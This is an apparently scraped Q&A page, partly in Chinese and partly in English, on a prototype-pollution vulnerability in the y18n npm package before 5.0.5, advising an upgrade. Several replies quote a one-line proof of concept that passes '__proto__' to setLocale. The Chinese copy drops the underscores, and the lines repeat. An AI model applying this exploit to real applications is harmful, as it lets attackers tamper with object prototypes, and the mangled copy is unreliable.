y18n@4.0.0 被自动化安全检查标记为存在漏洞。建议升级到5.0.5版本。
dced5bon1#
面对相同的问题,这会影响5.0.5之前的y18n包。PoC由po6ix提供:
const y18n = require('y18n')(); y18n.setLocale('proto'); y18n.updateLocale({polluted: true}); console.log(polluted); // true
u7up0aaq2#
Facing the same issue!This affects the package y18n before 5.0.5. PoC by po6ix: const y18n = require('y18n')(); y18n.setLocale('__proto__'); y18n.updateLocale({polluted: true}); console.log(polluted); // true
This affects the package y18n before 5.0.5. PoC by po6ix: const y18n = require('y18n')(); y18n.setLocale('__proto__'); y18n.updateLocale({polluted: true}); console.log(polluted); // true
2条答案
按热度按时间dced5bon1#
面对相同的问题,这会影响5.0.5之前的y18n包。PoC由po6ix提供:
u7up0aaq2#
Facing the same issue!
This affects the package y18n before 5.0.5. PoC by po6ix: const y18n = require('y18n')(); y18n.setLocale('__proto__'); y18n.updateLocale({polluted: true}); console.log(polluted); // true